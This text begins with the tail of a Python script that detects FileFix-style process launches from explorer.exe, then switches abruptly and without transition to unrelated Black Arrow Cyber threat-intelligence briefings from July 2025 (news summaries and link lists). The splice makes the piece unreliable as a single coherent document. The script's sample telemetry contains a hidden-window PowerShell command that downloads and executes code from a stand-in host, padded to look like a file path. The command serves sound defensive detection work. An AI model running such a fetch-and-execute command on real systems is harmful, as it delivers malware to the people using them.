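        return len(self.reasons)


def basename(path: str) -> str:
    """Last path component, lower-cased, for Windows-style paths."""
    return path.rsplit("\\", 1)[-1].lower()


def analyse_event(event: dict):
    """Return a Finding when the event meets the threshold, else None."""
    if event.get("EventID") != 1:
        return None
    parent = basename(event.get("ParentImage", ""))
    child = basename(event.get("Image", ""))
    cmd = event.get("CommandLine", "")
    if parent != "explorer.exe" or child not in SUSPICIOUS_CHILDREN:
        return None
    finding = Finding(parent, child, cmd,
                      ["interpreter/LOLBin spawned directly by explorer.exe"])
    if HIDDEN_FLAGS.search(cmd):
        finding.reasons.append("hidden-window or encoded/non-interactive flag")
    if ADDRESS_BAR_PADDING.search(cmd):
        finding.reasons.append("padding that hides the command behind a fake path")
    if REMOTE_URL.search(cmd):
        finding.reasons.append("remote URL in command line")
    return finding if finding.score >= ALERT_THRESHOLD else None


def analyse_log(lines):
    """Run analyse_event over JSON-lines telemetry; skip blank lines."""
    findings = []
    for line in lines:
        line = line.strip()
        if not line:
            continue
        finding = analyse_event(json.loads(line))
        if finding:
            findings.append(finding)
    return findings


# Constructed sample telemetry: two benign launches, one FileFix-style launch
# (example.invalid is a reserved name, not a real host), and one Office-spawned
# shell that this rule deliberately leaves to other detections.
SAMPLE_LOG = r"""
{"EventID": 1, "ParentImage": "C:\\Windows\\explorer.exe", "Image": "C:\\Windows\\System32\\notepad.exe", "CommandLine": "\"C:\\Windows\\System32\\notepad.exe\" C:\\Users\\alice\\notes.txt"}
{"EventID": 1, "ParentImage": "C:\\Windows\\explorer.exe", "Image": "C:\\Windows\\System32\\cmd.exe", "CommandLine": "\"C:\\Windows\\System32\\cmd.exe\""}
{"EventID": 1, "ParentImage": "C:\\Windows\\explorer.exe", "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "CommandLine": "powershell.exe -w hidden -c \"iex (iwr https://example.invalid/s)\"                                # C:\\Shares\\HR\\policy.pdf"}
{"EventID": 1, "ParentImage": "C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE", "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "CommandLine": "powershell.exe -nop -enc AAAA"}
"""

if __name__ == "__main__":
    for f in analyse_log(SAMPLE_LOG.splitlines()):
        print(f"[score {f.score}] {f.parent} -> {f.child}: {'; '.join(f.reasons)}")
```

Only the third event is reported: the benign cmd.exe launch scores a single indicator and stays below the threshold, and the Office-spawned shell has the wrong parent for this rule. The threshold is the knob to tune against your own baseline of explorer.exe children before deploying anything like this as an alert.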
Firms Have a Fake North Korean IT Worker Problem – Here’s How to Stop It
A growing number of organisations are being targeted by fraudulent job applicants, many linked to North Korea, who use fake identities, deepfake videos, and AI-generated responses to secure remote IT roles. These individuals have successfully infiltrated major firms, sometimes gaining access to sensitive data and extorting employers. Some companies have reported hundreds of suspicious applications in just weeks. Key warning signs include impressive CVs with minimal LinkedIn presence, reluctance to attend in-person meetings, and inconsistencies in personal details. Without stronger collaboration between HR, legal, and cyber security teams, businesses remain vulnerable to these evolving and well-resourced threats.
https://www.theregister.com/2025/07/13/fake_it_worker_problem/
Orgs and Individuals Clinging to Windows 10 Face Heightened Risk, Says NCSC
The UK’s NCSC has warned that continued reliance on Windows 10 places organisations and individuals at increasing risk as the system nears end-of-life in October 2025. After this date, Microsoft will no longer provide security updates or support, making unpatched systems prime targets for cyber attacks. Despite being over a decade old, Windows 10 remains widely used, but the NCSC urges a move to Windows 11, which offers stronger built-in protections by default. Organisations delaying the upgrade risk undermining their cyber resilience and may fall short of basic security standards, such as those required under the UK’s Cyber Essentials certification.
Supplier Risk Is Breaking the Size Myth in Cyber
Organisations of all sizes face growing risk from cyber attacks targeting their suppliers, with over half of recent incidents linked to third parties. The number of globally disruptive cyber attacks has nearly doubled since 2020, and nearly half of affected businesses report revenue loss. Smaller firms are not shielded by size, and larger ones cannot rely on internal measures alone. Increasing use of artificial intelligence and global tensions are widening the threat landscape. Businesses are urged to map their supplier dependencies, assess third-party risks, and ensure continuity plans account for supplier failure.
Most European Financial Firms Still Lagging on DORA Compliance
Six months after DORA came into force, most European financial services firms still fall short of compliance, with 96% admitting their current data resilience measures are insufficient. Key challenges include oversight of third-party risks, increased pressure on IT teams, and rising costs from technology providers. One in five firms has yet to secure budget for implementation. Despite this, 94% now rank DORA as a higher organisational priority, with many integrating it into broader resilience plans. Regulators can impose significant fines for non-compliance, highlighting the urgency for firms to accelerate their cyber resilience efforts.
https://www.infosecurity-magazine.com/news/european-financial-dora-compliance/
AI Cloaking Tools Enable Harder-to-Detect Cyber Attacks
Threat actors are now using AI-powered cloaking tools to hide phishing and malware sites from detection, making cyber attacks harder to identify. Services like Hoax Tech and JS Click Cloaker offer cloaking-as-a-service, using machine learning and behavioural profiling to show scam content to real users while serving benign pages to security scanners. These tools assess hundreds of data points in real time and can personalise content to increase success. Experts warn this marks a serious shift in the threat landscape, urging organisations to adopt behaviour-based detection, multi-layered defences and adaptive technologies to stay ahead of these evolving threats.
https://www.infosecurity-magazine.com/news/ai-cloaking-tools-enable-complex/
Ransomware Surges 63% in Q2
Ransomware attacks surged by 63% in the second quarter of 2025, reaching a record 276 publicly disclosed incidents according to BlackFog. Each month in the quarter broke previous records, with June alone seeing a 113% year-on-year increase. Healthcare was the most targeted sector, followed by government and services, while retail also saw its highest ever Q2 attack levels, particularly in the UK. The Qilin ransomware group led activity, responsible for 10% of incidents. Over 80% of ransomware attacks remain undisclosed, with BlackFog estimating more than 1,400 hidden cases this quarter. The report reinforces the urgent need for stronger data protection measures.
https://betanews.com/2025/07/16/ransomware-surges-63-percent-in-q2/
All 6.5m Co-Op Members Had Data Stolen in Recent Cyber Attack, Retailer Admits
The UK retailer Co-op has confirmed that all 6.5 million of its members had their personal data stolen during a cyber attack earlier this year. The breach, which led to the shutdown of parts of its IT systems in April, allowed attackers to access names, addresses and contact details. The organisation's CEO described the impact on members and staff as devastating. This incident highlights the ongoing risk to large member-based organisations and the need for strong cyber security controls to protect personal data and maintain trust in the face of growing threats.
North Korean Hackers Blamed for Record Spike in Crypto Thefts in 2025
A surge in cryptocurrency thefts has seen over $2 billion stolen in the first half of 2025 alone, already exceeding losses for the whole of last year. A major breach at crypto exchange Bybit, reportedly carried out by North Korean hackers, accounted for $1.4 billion of this amount. The stolen funds are believed to be supporting North Korea’s nuclear programme and helping evade international sanctions. Analysts warn this reflects a broader strategy by North Korea, which includes using remote IT workers to infiltrate Western firms, steal intellectual property, and extort payments under threat of data leaks.
Russia Shifts Cyber War Focus from US to UK Following Trump’s Election
UK intelligence agencies have warned of a marked increase in Russian state-backed cyber attacks targeting British infrastructure since the start of 2025. This shift appears to be a deliberate move away from US targets following Donald Trump’s election, as the Kremlin aims to avoid provoking the new administration. The UK is now seen as Russia’s primary adversary, with threats focusing on disruption and chaos, particularly against critical infrastructure such as energy and healthcare. Officials have noted a surge in hybrid operations combining technology, misinformation and proxies, with some attacks traced to highly capable hacker groups operating under Russian direction.
Europol Disrupts Major Network of Russian-Speaking Cyber Criminals Targeting Ukraine and Its Allies
Europol has led a major international operation disrupting the cyber criminal group NoName057(16), known for targeting Ukraine and NATO countries with denial-of-service attacks. Coordinated across 12 nations, the effort dismantled a network of over 100 servers and resulted in arrests, searches, and legal action against key individuals. The group, with over 4,000 supporters, used gamified tactics and cryptocurrency rewards to encourage participation. Authorities say the attacks were ideologically driven and aimed at countries supporting Ukraine. This highlights the growing threat of politically motivated cyber attacks and the scale of coordination required to counter them.
Governance, Risk and Compliance
Most cyber security risk comes from just 10% of employees - Help Net Security
Compliance is evolving — Is your resilience ready? | TechRadar
True cyber resilience comes from culture | BFI
Factoring Cyber Security Into Finance's Digital Strategy
Turning Cyber Risk Into Boardroom Metrics That Matter
How to Calculate Cyber Security ROI for CEOs and Boards | TechTarget
Stop settling for check-the-box cyber security policies - Help Net Security
Threats
Ransomware, Extortion and Destructive Attacks
Ransomware surges 63 percent in Q2 - BetaNews
Newly Emerged GLOBAL GROUP RaaS Expands Operations with AI-Driven Negotiation Tools
Nearly one-third of Irish firms paid a cyber ransom in last year
Wiper Malware: The Threat to Businesses | SC Media UK
French and UK Authorities Arrest Suspects in Ransomware Cases
Interlock ransomware adopts FileFix method to deliver malware
Interlock Ransomware Unleashes New RAT in Widespread Campaign - Infosecurity Magazine
Police disrupt “Diskstation” ransomware gang attacking NAS devices
Anatomy of a Scattered Spider attack: A growing ransomware threat evolves | CSO Online
Retail Ransomware Attacks Jump 58% Globally in Q2 2025 - Infosecurity Magazine
Ryuk ransomware operator extradited to US, faces five years in federal prison | CyberScoop
Microsoft Exposes Scattered Spider’s Latest Tactics - Infosecurity Magazine
Report: Global retail ransomware intrusions surge | SC Media
Iranian-Backed Pay2Key Ransomware Resurfaces with 80% Profit Share for Cyber Criminals
Ransomware Victims
Report: Global retail ransomware intrusions surge | SC Media
Four people bailed after arrests over cyber attacks on M&S, Harrods and Co-op - TheIndustry.fashion
Some Glasgow City Council online services still down | Glasgow Times
M&S resumes online recruitment following cyber attack - Retail Gazette
United Natural Foods Expects $400M revenue impact from June cyber attack
Phishing & Email Based Attacks
Microsoft Teams phishing spreads updated Matanbuchus malware loader | SC Media
13 Romanians Arrested for Phishing the UK’s Tax Service - SecurityWeek
Hackers Can Hide Malicious Code in Gemini's Email Summaries
Beware! Research shows Gmail's AI email summaries can be hacked - Android Authority
Preventing Zero-Click AI Threats: Insights from EchoLeak | Trend Micro (US)
Other Social Engineering
How deepfake AI job applicants are stealing remote work
Fake North Korean IT workers: How companies can stop them • The Register
How North Korea infiltrates its IT experts into Western companies
Fraud, Scams and Financial Crime
Over Half of “Finfluencer” Victims Have Lost Money, Says TSB - Infosecurity Magazine
Ex-intelligence officer jailed for stealing bitcoin from Silk Road 2.0 operator - iTnews
Indian Police Raid Tech Support Scam Call Center - Infosecurity Magazine
SIM scammer's sentence increased to 12 years, after failing to pay back victim $20 million
Artificial Intelligence
AI Cloaking Tools Enable Harder-to-Detect Cyber Attacks - Infosecurity Magazine
Newly Emerged GLOBAL GROUP RaaS Expands Operations with AI-Driven Negotiation Tools
One in 12 US/UK Employees Uses Chinese GenAI Tools - Infosecurity Magazine
AI adoption is booming but secure scaling not so much - Help Net Security
Grok-4 Falls to a Jailbreak Two days After Its Release - SecurityWeek
Security Flaws With Bitchat Highlight a ‘Systemic Issue’ With Vibe Coding
90% of Large Organisations Unprepared for AI-Enabled Threats | Security Magazine
Cyber Security Bosses Fretting About AI Attacks and Misuse
Researcher tricks ChatGPT into revealing security keys - by saying "I give up" | TechRadar
For developers and IT pros, AI can be both secret weapon and ticking time bomb | ZDNET
GPUHammer: New RowHammer Attack Variant Degrades AI Models on NVIDIA GPUs
Beware! Research shows Gmail's AI email summaries can be hacked - Android Authority
From Vibe Coding To Vibe Hacking — AI In A Hoodie
Curl creator mulls nixing bug bounty awards to stop AI slop • The Register
Malware
Microsoft Teams phishing spreads updated Matanbuchus malware loader | SC Media
Hackers hide dangerous Mac trojan in legit apps | Cybernews
WordPress Gravity Forms developer hacked to push backdoored plugins
Hackers Exploit DNS Queries for C2 Operations and Data Exfiltration, Bypassing Traditional Defences
Hackers exploit a blind spot by hiding malware inside DNS records - Ars Technica
Google sues 25 alleged BadBox 2.0 botnet operators • The Register
AsyncRAT Spawns a Labyrinth of Forks
North Korean XORIndex malware hidden in 67 malicious npm packages
Threat hunting case study: Lumma infostealer | Intel 471
Vulnerable firmware for Gigabyte motherboards could allow bootkit installation - Help Net Security
Bots/Botnets
Google sues 25 alleged BadBox 2.0 botnet operators • The Register
Mobile
Spyware on Androids Soars - Security Boulevard
Hackers Love These 7 Screenshots You Keep in Your Gallery
Android Malware Konfety evolves with ZIP manipulation and dynamic loading
Don’t Tap That Notification—This Is How Malware Sneaks Onto Smartphones
SIM scammer's sentence increased to 12 years, after failing to pay back victim $20 million
July 2025 Breaks a Decade of Monthly Android Patches - SecurityWeek
Altered Telegram App Steals Chinese Users' Android Data
Denial of Service/DoS/DDoS
DDoS peaks hit new highs: Cloudflare mitigated massive 7.3 Tbps assault
Averted DDoS attacks spike, report finds | SC Media
Europol disrupts pro-Russian NoName057(16) DDoS hacktivist group
Internet of Things – IoT
Your Mercedes or VW could get hacked via Bluetooth | PCWorld
350M Cars, 1B Devices Exposed to 1-Click Bluetooth RCE
Uncovering the Cyber Security Risk in Smart Meter Data Storage | SC Media UK
Neglecting printer security is leaving you wide open to cyber attacks | IT Pro
Printer Security Gaps: A Broad, Leafy Avenue to Compromise
Data Breaches/Leaks
'123456' password exposed chats for 64 million McDonald’s job applicants
US Data Breaches Head for Another Record Year After 11% Surge - Infosecurity Magazine
How top military chief’s role in Afghan data leak was hidden
The Afghan data breach has already cost millions. What happens next?
Louis Vuitton says UK customer data stolen in cyber-attack | Cybercrime | The Guardian
Paddy Power and BetFair have suffered a data breach • Graham Cluley
Waltz brushes off SignalGate questions, points finger at CISA | CyberScoop
Data Breach at Debt Settlement Firm Impacts 160,000 People - SecurityWeek
Why hackers love Europe’s hospitals – POLITICO
Over 5.4 Million Affected in Healthcare Data Breach at Episource - Infosecurity Magazine
Anne Arundel Dermatology Data Breach Impacts 1.9 Million People - SecurityWeek
Organised Crime & Criminal Actors
“Telegram has become the new dark web” - 14.07.2025 | BURSA.RO
Abacus dark web drug market goes offline in suspected exit scam
How Criminal Networks Exploit Insider Vulnerabilities
SIM scammer's sentence increased to 12 years, after failing to pay back victim $20 million
Ryuk ransomware operator extradited to US, faces five years in federal prison | CyberScoop
Cyber crime Victim Suicide: Bengaluru Man Dies After Rs 11 Lakh Digital Scam
Cambodia Makes 1,000 Arrests in Latest Crackdown on Cyber Crime - SecurityWeek
Cryptocurrency/Cryptomining/Cryptojacking/NFTs/Blockchain
North Korean hackers blamed for record spike in crypto thefts in 2025 | TechCrunch
Over Half of “Finfluencer” Victims Have Lost Money, Says TSB - Infosecurity Magazine
Ex-intelligence officer jailed for stealing bitcoin from Silk Road 2.0 operator - iTnews
Millions in savers’ cash goes missing after crypto company collapses
Hacker steals $27 million in BigONE exchange crypto breach
MITRE Launches New Framework to Tackle Crypto Risks - Infosecurity Magazine
Hackers Exploit Apache HTTP Server Flaw to Deploy Linuxsys Cryptocurrency Miner
Insider Risk and Insider Threats
Most cyber security risk comes from just 10% of employees - Help Net Security
One in 12 US/UK Employees Uses Chinese GenAI Tools - Infosecurity Magazine
How deepfake AI job applicants are stealing remote work
Fake North Korean IT workers: How companies can stop them • The Register
How North Korea infiltrates its IT experts into Western companies
Ex-intelligence officer jailed for stealing bitcoin from Silk Road 2.0 operator - iTnews
How Criminal Networks Exploit Insider Vulnerabilities
US Army soldier pleads guilty to extorting 10 tech, telecom firms
Ex-soldier Googled “can hacking be treason?” pleads guilty • The Register
Insurance
Cyber Insurance Premiums Drop, but Coverage Is Key
Supply Chain and Third Parties
Supplier risk is breaking the size myth in cyber | Insurance Business America
Cloud/SaaS
Hackers Leverage Microsoft Teams to Spread Matanbuchus 3.0 Malware to Targeted Firms
Why your Microsoft 365 setup might be more vulnerable than you think - Help Net Security
SaaS Security Adoption Grows Amid Rising Breach Rates - Infosecurity Magazine
Iran seeks three cloud providers to power its government • The Register
Outages
Cloudflare says 1.1.1.1 outage not caused by attack or BGP hijack
Encryption
How to Start Preparing for a Post-Quantum Future
How CISOs Can Prepare for the Quantum Cyber Security Threat
Safeguarding data in quantum era | Professional Security Magazine
What EU's PQC roadmap means on the ground - Help Net Security
Passwords, Credential Stuffing & Brute Force Attacks
'123456' password exposed chats for 64 million McDonald’s job applicants
From ‘P@ssw0rd’ to payday: Weak credentials threaten financial systems - Digital Journal
Ranked: The World's Most Common Passwords
98% of passwords can be cracked in seconds, analysis finds | Cybernews
Social Media
Quelle surprise! Twitter faces criminal probe in France • Graham Cluley
Training, Education and Awareness
Most cyber security risk comes from just 10% of employees - Help Net Security
Regulations, Fines and Legislation
Most European Financial Firms Still Lagging on DORA Compliance - Infosecurity Magazine
Cyber security of banks - News - Rádio RSI English - STVR
How financial IT becomes resilient: Implement DORA securely: By Krik Gunning
What EU's PQC roadmap means on the ground - Help Net Security
UK Online Safety Act 'not up to scratch' on misinformation • The Register
US aims to ban China technology in undersea telecoms cables | The Straits Times
Top US cyber agency CISA shrinks under Trump budget, staff cuts
Defense Department to Spend $1B on ‘Offensive Cyber Operations’
Operational risks amid cyber policy uncertainty
Models, Frameworks and Standards
Most European Financial Firms Still Lagging on DORA Compliance - Infosecurity Magazine
How financial IT becomes resilient: Implement DORA securely: By Krik Gunning
MITRE Launches New Framework to Tackle Crypto Risks - Infosecurity Magazine
Data Protection
Buy Now, Pay Later... with your data - Help Net Security
Careers, Working in Cyber and Information Security
Military Veterans May Be What Cyber Security Is Looking For
Why burnout is one of the biggest threats to your security | TechRadar
What Fortune 100s are getting wrong about cyber security hiring - Help Net Security
Cyber Training: Post Challenge, Where Are the Skills Learned? | SC Media UK
Law Enforcement Action and Take Downs
US Army soldier pleads guilty to extorting 10 tech, telecom firms
Europol disrupts pro-Russian NoName057(16) DDoS hacktivist group
Newly Emerged GLOBAL GROUP RaaS Expands Operations with AI-Driven Negotiation Tools
13 Romanians Arrested for Phishing the UK’s Tax Service - SecurityWeek
French and UK Authorities Arrest Suspects in Ransomware Cases
Europol disrupts major network of Russian-speaking cyber criminals targeting Ukraine and its allies
Quelle surprise! Twitter faces criminal probe in France • Graham Cluley
SIM scammer's sentence increased to 12 years, after failing to pay back victim $20 million
Ryuk ransomware operator extradited to US, faces five years in federal prison | CyberScoop
Cambodia Makes 1,000 Arrests in Latest Crackdown on Cyber Crime - SecurityWeek
Indian Police Raid Tech Support Scam Call Center - Infosecurity Magazine
Four people bailed after arrests over cyber attacks on M&S, Harrods and Co-op - TheIndustry.fashion
FBI seized multiple piracy sites distributing pirated video games
Misinformation, Disinformation and Propaganda
UK Online Safety Act 'not up to scratch' on misinformation • The Register
Nation State Actors, Advanced Persistent Threats (APTs), Cyber Warfare, Cyber Espionage and Geopolitical Threats/Activity
Cyber Warfare and Cyber Espionage
Russia shifts cyber war focus from US to UK following Trump's election | TechRadar
US aims to ban China technology in undersea telecoms cables | The Straits Times
Submarine Cable Security at Risk Amid Geopolitical Tensions & Limited Repair Capabilities
MPs Warn of “Significant” Iranian Cyber-Threat to UK - Infosecurity Magazine
Cyber attacks are evolving – so too must government response - New Statesman
What Is A Military Cyber Command And What Does It Do?
Defense Department to Spend $1B on ‘Offensive Cyber Operations’
Nation State Actors
Cyber attacks are evolving – so too must government response - New Statesman
Nearly one-third of Irish firms paid a cyber ransom in last year
China
One in 12 US/UK Employees Uses Chinese GenAI Tools - Infosecurity Magazine
China’s cyber sector amplifies Beijing’s hacking of US targets - The Washington Post
What It Takes to Stop the Next Salt Typhoon
US aims to ban China technology in undersea telecoms cables | The Straits Times
Submarine Cable Security at Risk Amid Geopolitical Tensions & Limited Repair Capabilities
Chinese Hackers Still Trying to Break Into Telecoms Across Globe
Altered Telegram App Steals Chinese Users' Android Data
US National Guard unit was 'extensively' hacked by Salt Typhoon in 2024, memo says | Reuters
Spain awarded €12.3 million in contracts to Huawei
Russia
Russia shifts cyber war focus from US to UK following Trump's election | TechRadar
Submarine Cable Security at Risk Amid Geopolitical Tensions & Limited Repair Capabilities
Europol disrupts pro-Russian NoName057(16) DDoS hacktivist group
Nato unit helping combat Putin's 'hybrid warfare' threat on British soil
Europol disrupts major network of Russian-speaking cyber criminals targeting Ukraine and its allies
Ukrainian hackers claim IT attack on Russian drone maker • The Register
Iran
MPs Warn of “Significant” Iranian Cyber-Threat to UK - Infosecurity Magazine
Iranian-Backed Pay2Key Ransomware Resurfaces with 80% Profit Share for Cyber Criminals
Iran seeks three cloud providers to power its government • The Register
North Korea
How deepfake AI job applicants are stealing remote work
Fake North Korean IT workers: How companies can stop them • The Register
How North Korea infiltrates its IT experts into Western companies
North Korean hackers blamed for record spike in crypto thefts in 2025 | TechCrunch
North Korean XORIndex malware hidden in 67 malicious npm packages
Other Nation State Actors, Hacktivism, Extremism, Terrorism and Other Geopolitical Threat Intelligence
Hacktivism Increasingly Targeting Critical Infrastructure | Security Magazine
Tools and Controls
Most cyber security risk comes from just 10% of employees - Help Net Security
AI adoption is booming but secure scaling not so much - Help Net Security
DNS should be your next security priority: Lessons from NIST
SaaS Security Adoption Grows Amid Rising Breach Rates - Infosecurity Magazine
Cyber-Insurance Premiums Drop, but Coverage Is Key
Neglecting printer security is leaving you wide open to cyber attacks | IT Pro
Printer Security Gaps: A Broad, Leafy Avenue to Compromise
Hackers hide dangerous Mac trojan in legit apps | Cybernews
Hackers Exploit DNS Queries for C2 Operations and Data Exfiltration, Bypassing Traditional Defences
Hackers exploit a blind spot by hiding malware inside DNS records - Ars Technica
Police disrupt “Diskstation” ransomware gang attacking NAS devices
Compliance is evolving — Is your resilience ready? | TechRadar
ISC2 Finds Orgs Are Increasingly Leaning on AI
Making security and development co-owners of DevSecOps - Help Net Security
Security Flaws With Bitchat Highlight a ‘Systemic Issue’ With Vibe Coding
For developers and IT pros, AI can be both secret weapon and ticking time bomb | ZDNET
Curl creator mulls nixing bug bounty awards to stop AI slop • The Register
Cyber security executives love AI, cyber security analysts distrust it | TechRadar
Things to think about when deploying AI tools in the cyber security space
UK launches vulnerability research program for external experts
NCSC Launches Vulnerability Research Institute to Boost UK Resilience - Infosecurity Magazine
Other News
Hackers swap biometric data to bypass Windows login | Cybernews
Hacktivism Increasingly Targeting Critical Infrastructure | Security Magazine
Securing vehicles as they become platforms for code and data - Help Net Security
NCA says 'crude' comparison to FBI efficiency 'not credible' • The Register
Cyber Security Isn’t Just For Experts Anymore: Why You Should Care
Banks urged to beef up cyber security amid more incidents of financial phishing | ABS-CBN News
70% of healthcare cyber attacks result in delayed patient care, report finds – DataBreaches.Net
Understanding replay attacks: A hidden threat in cyber security
Why hackers love Europe’s hospitals – POLITICO
Train Brakes Can Be Hacked Over Radio—And the Industry Knew for 20 Years - SecurityWeek
Vulnerability Management
Brits clinging to Windows 10 face heightened risk, says NCSC | Computer Weekly
NCSC Urges Enterprises to Upgrade to Microsoft Windows 11 to Avoid Cyb - Infosecurity Magazine
Microsoft extends updates for old Exchange and Skype servers • The Register
Don't Want to Upgrade to Windows 11? Microsoft Offers Free Windows 10 Security Updates - CNET
Another WannaCry-size cyber event likely, report warns :: Insurance Day
NCSC Launches Vulnerability Research Institute to Boost UK Resilience - Infosecurity Magazine
Vulnerabilities
Exploits for pre-auth Fortinet FortiWeb RCE flaw released, patch now
CitrixBleed 2 Flaw Poses Unacceptable Risk: CISA - SecurityWeek
Urgent: Google Releases Critical Chrome Update for CVE-2025-6558 Exploit Active in the Wild
Windows KB5064489 emergency update fixes Azure VM launch issues
Fully Patched SonicWall Gear Under Likely Zero-Day Attack
Critical SharePoint RCE Vulnerability Exploited Using Malicious XML Payload Within Web Part
Chrome fixes 6 security vulnerabilities. Get the update now! | Malwarebytes
Critical Wing FTP Server vulnerability exploited in the wild (CVE-2025-47812) - Help Net Security
Oracle Patches 200 Vulnerabilities With July 2025 CPU - SecurityWeek
Cisco Warns of Critical ISE Flaw Allowing Unauthenticated Attackers to Execute Root Code
VMware Flaws That Earned Hackers $340,000 at Pwn2Own Patched - SecurityWeek
Cisco Discloses '10' Flaw in ISE, ISE-PIC — Patch Now
July 2025 Breaks a Decade of Monthly Android Patches - SecurityWeek
Hackers Exploit Apache HTTP Server Flaw to Deploy Linuxsys Cryptocurrency Miner
Vulnerable firmware for Gigabyte motherboards could allow bootkit installation - Help Net Security
Over 600 Laravel Apps Exposed to Remote Code Execution Due to Leaked APP_KEYs on GitHub
Sector Specific
Industry-specific threat intelligence reports are available.
Contact us to receive tailored reports specific to the industry/sector and geographies in which you operate.
· Automotive
· Construction
· Critical National Infrastructure (CNI)
· Defence & Space
· Education & Academia
· Energy & Utilities
· Estate Agencies
· Financial Services
· FinTech
· Food & Agriculture
· Gaming & Gambling
· Government & Public Sector (including Law Enforcement)
· Health/Medical/Pharma
· Hotels & Hospitality
· Insurance
· Legal
· Manufacturing
· Maritime & Shipping
· Oil, Gas & Mining
· OT, ICS, IIoT, SCADA & Cyber-Physical Systems
· Retail & eCommerce
· Small and Medium Sized Businesses (SMBs)
· Startups
· Telecoms
· Third Sector & Charities
· Transport & Aviation
· Web3
Contact us to help assess where your risks lie and to ensure you are doing all you can do to keep you and your business secure.
Look out for our ‘Cyber Tip Tuesday’ video blog, also available on our YouTube channel.
You can also follow us on Facebook, Twitter and LinkedIn.
Links to articles are for interest and awareness and linking to or reposting external content does not endorse any service or product, likewise we are not responsible for the security of external links.
Black Arrow Cyber Threat Intelligence Briefing 11 July 2025
Black Arrow Cyber Threat Intelligence Briefing 11 July 2025:
-‘The Worst Thing an Employee Could Do’: Workers Are Covering Up Cyber Attacks for Fear of Reprisal – Here’s Why That’s a Huge Problem
-Employees Are Quietly Bringing AI to Work and Leaving Security Behind
-Qantas Attack Reveals One Phone Call Can Crack Cyber Security’s Weakest Link: Humans
-Financial Firms Are Locking the Front Door but Leaving the Back Open
-Teens Arrested by NCA over Cyber Attacks on M&S, Harrods and Co-Op
-Should UK Companies Be Required to Disclose Major Cyber Attacks? M&S Chairman Archie Norman Thinks So
-The Cost of Unpreparedness: Why Many Businesses Lack a Continuity Strategy
-Experts Warn This Top GenAI Tool Is Being Used to Build Phishing Websites
-The Rising Threat of Mobile Malware: How to Protect Your Device in 2025
-Nearly 8,500 Small and Medium Businesses Faced Cyber Attacks Through Fake Downloads and Mimic AI Tools in 2025
-Why Data Sovereignty Is Not Just a Legal Concern but a Cyber Security Imperative
-Whole of Society Must Respond to Threats Bringing ‘War to the Doorstep’, MPs Say
-Businesses at Greater Risk of Cyber Attack Due to Geopolitical Tensions
Welcome to this week’s Black Arrow Cyber Threat Intelligence Briefing – a weekly digest, collated and curated by our cyber experts to provide senior and middle management with an easy-to-digest round-up of the most notable threats, vulnerabilities and cyber related news from the last week.
Executive Summary
We start this week’s review by looking at the employees in your organisation. A report reveals that two out of five UK office workers would not alert their employer to a suspected cyber attack, mainly for fear of being blamed, while a separate report shows that 90% of employees are entering data into unauthorised AI tools without approval. The consequences of weak security among employees and third parties are highlighted by the attack on a supplier to Qantas that resulted in the loss of personal data of up to 6 million customers, and by a separate study finding poor security across most third-party suppliers to the financial sector.
In a further update on the attacks on UK retailers including M&S, four suspects aged between 17 and 20 have been arrested, while the Chairman of M&S has called for all organisations to be obliged to disclose when they have been attacked. We also report on the real need for organisations to be prepared for how they will respond to cyber security incidents.
We report on the risks of Generative AI, mobile malware, malicious applications imitating trusted names such as Zoom, and attacks on individuals. We also report on how geopolitical tensions are increasing the risks of cyber attacks on organisations, highlighting the need for an objective leadership-driven risk assessment and cyber security strategy.
We know that while many organisations look to their IT team or service provider to manage their cyber security, the attacker instead looks to the employee as one of the easiest ways to break into the systems. Cyber security can only work if it is embraced by an upskilled leadership team that takes command of its risk management and maintenance of controls across people, operations and technology including the organisation’s culture.
Top Cyber Stories of the Last Week
‘The Worst Thing an Employee Could Do’: Workers Are Covering Up Cyber Attacks for Fear of Reprisal – Here’s Why That’s a Huge Problem
A recent study has revealed that 39% of UK office workers would not report a suspected cyber attack to their employer, largely due to fear of blame or disciplinary action. This silence persists despite relatively high awareness, with 79% of employees confident they could recognise a threat and 43% able to define ransomware. The findings suggest a culture problem, where fear of repercussions discourages openness and transparency. Past incidents show some staff have been punished or even dismissed after cyber attacks, reinforcing this reluctance. Building a blame-free reporting culture and improving cyber security training are critical steps forward.
Employees Are Quietly Bringing AI to Work and Leaving Security Behind
Despite growing efforts by IT departments to implement controls around artificial intelligence (AI), employees are increasingly using unapproved AI tools without oversight. Nearly three quarters of IT leaders have detected such unauthorised use, with over 90% of employees admitting to entering data into these tools without approval. This “shadow AI” poses a significant risk to organisations, particularly around data leakage and loss of visibility. Yet many staff see the benefits as outweighing the risks. The challenge for leadership is to close the gap between employee behaviour and governance, through clear policies, practical training, and integrating approved AI into daily workflows.
https://www.helpnetsecurity.com/2025/07/11/organizations-shadow-ai-risk/
Qantas Attack Reveals One Phone Call Can Crack Cyber Security’s Weakest Link: Humans
The Qantas data breach has highlighted how human error remains a critical weakness in cyber security. Attackers gained access to personal data for up to 6 million customers by exploiting an offshore IT support provider using social engineering, a method where criminals deceive staff into granting access. This incident follows a series of high-profile breaches across Australia’s healthcare, financial and telecommunications sectors. Experts warn that the growing use of third-party systems and tools like voice-cloning artificial intelligence are increasing the risks. Regulators are urging organisations to improve operational resilience, particularly by strengthening multi-factor authentication and scrutinising third-party cyber security controls.
Financial Firms Are Locking the Front Door but Leaving the Back Open
Financial institutions are improving their own cyber security defences, but many remain vulnerable through third-party suppliers. A recent study found that 92% of vendors serving the financial sector scored poorly in managing sensitive data, and 65% were not keeping systems updated against known risks. While direct cyber attacks on banks and insurers have declined, attackers are increasingly targeting vendors as a way in. These findings highlight that strong internal protections are not enough. Senior leaders should ensure third-party risk is actively monitored, assessed regularly, and addressed through procurement, contracts, and ongoing oversight.
https://www.helpnetsecurity.com/2025/07/11/financial-firms-third-party-cyber-risk/
Teens Arrested by NCA over Cyber Attacks on M&S, Harrods and Co-Op
The UK’s National Crime Agency has arrested four individuals, aged between 17 and 20, in connection with cyber attacks on major UK retailers including M&S, Harrods and Co-op. The suspects were detained on suspicion of offences such as computer misuse, blackmail and money laundering. Electronic evidence was seized and the investigation remains ongoing. The NCA has stressed the importance of businesses working closely with law enforcement when incidents occur, highlighting that early engagement can support more effective responses to serious cyber threats.
https://techinformed.com/teens-arrested-over-cyber-attacks-on-ms/
Should UK Companies Be Required to Disclose Major Cyber Attacks? M&S Chairman Archie Norman Thinks So
